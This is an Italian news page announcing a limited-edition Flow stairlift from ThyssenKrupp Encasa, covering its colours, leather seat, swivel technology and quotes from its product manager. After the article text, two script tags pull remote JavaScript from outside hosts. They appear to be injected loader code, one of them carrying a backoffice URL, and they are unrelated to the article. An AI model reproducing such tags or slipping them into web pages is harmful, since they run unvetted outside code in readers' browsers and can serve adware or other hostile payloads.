1. Home
  2. Notizie e Mercato
  3. ThyssenKrupp Encasa presenta la nuova poltroncina Flow “Limited Edition”

ThyssenKrupp Encasa presenta la nuova poltroncina Flow “Limited Edition”

Arredamento e Mobili di
5/5
votato da 1 persone
La nuova poltroncina Flow “Limited Edition” è un modello progettato in esclusiva, disponibile fino alla fine di marzo, con un design unico che incontra una tecnologia d’eccellenza


ThyssenKrupp Encasa ha lanciato un’edizione limitata della sua poltroncina montascale Flow per scala curva. Il modello è accattivante con il suo design esclusivo che conferisce alla poltroncina un look contemporaneo e di estrema eleganza. Il caratteristico mono-binario è progettato nei colori grigio titanio o moro. La seduta è rivestita in vera pelle naturale color cognac o caffè. Come per la versione standard, “Flow Limited Edition” è dotata di dispositivi di sicurezza d’avanguardia e dell’innovativa Tecnologia ASL (Advanced Swivel and Leveling Tecnology), brevetto esclusivo di ThyssenKrupp Encasa. Questa tecnologia permette alla poltroncina di ruotare lungo tutto il percorso assicurando all’utilizzatore una posizione di seduta ergonomica, confortevole e sicura. Fino alla fine di marzo, i consumatori hanno la possibilità di assicurarsi una di queste poltroncine in edizione limitata ottenendo tutti i vantaggi di una Flow senza alcun sovrapprezzo.

 L’ispirazione dagli ultimi trend del mondo dell’arredamento
Per progettare Flow “Limited Edition”, il team di Wilco van Eijgen, Flow product Manager, si è concentrato sui più recenti trend in fatto di arredamento e elettrodomestici.
C’è una chiara tendenza ai colori naturali, utilizzati in modo elegante. Questo è il motivo per cui abbiamo deciso verniciare il binario e la guida in più colori classici dando loro un tocco speciale, con l’utilizzo di effetti metallici” afferma Wilco van Eijgen.

Sono in arrivo altre novità
ThyssenKrupp Encasa analizza costantemente le necessità dei suoi consumatori, per questo ci sono sempre nuovi progetti in arrivo. Wilco van Eijgen: “ogni innovazione ha bisogno di tempo, soprattutto se è eccezionale e se si crede che possa essere davvero di qualità. Ecco perché tutti i nostri prodotti e le nostre innovazioni sono testati nel dettaglio prima di essere lanciati. I consumatori quindi possono ben essere impazienti di scoprire le novità”.
 

<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>